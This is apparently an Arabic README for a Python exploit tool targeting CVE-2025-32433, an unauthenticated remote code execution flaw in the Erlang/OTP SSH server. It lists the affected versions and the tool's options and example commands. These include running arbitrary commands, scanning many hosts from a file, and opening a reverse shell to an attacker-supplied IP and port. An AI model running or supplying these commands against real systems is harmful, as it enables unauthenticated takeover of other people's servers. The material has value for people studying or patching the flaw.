
تسمح الثغرة لمهاجم لديه وصول عبر الشبكة إلى خادم SSH الخاص بـ Erlang/OTP بتنفيذ تعليمات برمجية عشوائية دون مصادقة مسبقة.
الثغرة تسمح للمهاجم الذي لديه وصول شبكي إلى خادم SSH الخاص بـ Erlang/OTP بتنفيذ تعليمات برمجية عشوائية دون مصادقة مسبقة.
تم تحديد ثغرة خطيرة في خادم SSH الخاص بـ Erlang/OTP قد تسمح للمهاجم بتنفيذ تعليمات برمجية عن بُعد (RCE) دون مصادقة. من خلال استغلال خلل في معالجة رسائل بروتوكول SSH، يمكن لفاعل ضار الحصول على وصول غير مصرح به إلى الأنظمة المتأثرة وتنفيذ أوامر عشوائية دون بيانات اعتماد صالحة. قد يؤدي ذلك إلى اختراق تلك المضيفات، مما يسمح بالوصول غير المصرح به إلى البيانات الحساسة والتلاعب بها من قبل أطراف ثالثة، أو هجمات حجب الخدمة.
OTP-27.3.2 والإصدارات الأقدم
OTP-26.2.5.10 والإصدارات الأقدم
OTP-25.3.2.19 والإصدارات الأقدم
python cve-2025-32433.py <host> [options]
الخيارات:
-p PORT, --port PORT: منفذ SSH (الافتراضي: 22)
-t TIMEOUT, --timeout TIMEOUT: مهلة الاتصال بالثواني (الافتراضي: 5)
-c COMMAND, --command COMMAND: أمر مخصص للتنفيذ
--check: التحقق مما إذا كان الهدف معرضًا للثغرة
-u urls.txt, --urlfile urls.txt: ملف يحتوي على قائمة بالمضيفات لفحصها (مضيف واحد لكل سطر)
-o output.txt, --output output.txt: ملف الإخراج لتخزين النتائج.
--shell: إطلاق شل عكسي
--lhost LHOST: عنوان IP للمهاجم للشل العكسي
--lport LPORT: منفذ المهاجم للشل العكسي (الافتراضي: 4444)
python cve-2025-32433.py 127.0.0.1 --check
python cve-2025-32433.py 127.0.0.1 -c 'cat pwned.txt'
python cve-2025-32433.py 127.0.0.1 --shell --lhost 192.168.1.100 --lport 4444